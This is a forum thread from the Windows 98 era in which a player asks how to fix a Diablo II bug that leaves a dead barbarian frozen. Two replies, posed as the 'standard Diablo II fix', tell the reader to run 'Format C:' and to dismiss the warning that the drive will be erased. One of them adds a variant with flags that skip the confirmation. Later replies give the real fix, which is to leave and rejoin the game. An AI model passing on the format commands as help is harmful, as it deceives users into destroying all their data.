BIG Diablo 2 bug! HELP! - help not needed anymore

Sorry mods, but I need a quick response so im posting here. Feel free to move the thread if you want later.

I just died in Diablo 2, but it wont respawn my guy! He (a barbarian) just stands there like he is living but he cant move or use anything! Has anyone encountered this? This is VERY, VERY bad because I have ALOT of good armor on the ground town that I NEED, so I cant just quit and get my body in town. Anyone know how to fix this? Please respond soon! This sucks.

I know a quick fix.

Open up a DOS Prompt. To do this, click Start > Run. Once the box pops up, type in command. You will see a black box that appears, which will say something like this :

Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.

D:\WINDOWS\Desktop>

Once you see this, type Format C:. It will try to fool you by telling you it will erase your hard drive. This is of course nonsense, proceed to press Y. It will again try to fool you by shoving an indicator in your face, making it look like your hard drive is being erased.

Please do not be alarmed by this, it is the standard Diablo II fix procedure. Once the process is complete, reboot your system.

This should remove all the bugs in Diablo II. Good luck!

RSI: just use the command FORMAT C: /U /AUTOTEST. Then you don't have to press Y.

It's a common bug. I don't have the game but it happens to my friends sometimes a few (2-3) times per day. The only way to fix it is to leave the game and re-join it. You don't need to close and reopen D2.

Don't waste an imbue on 337 def. armor. At least save it for 550-650 defense armors (assuming you're in nightmare/hell difficulty).

Waste isnt a problem. By creating new characters I can churn out like 50 imbues a day
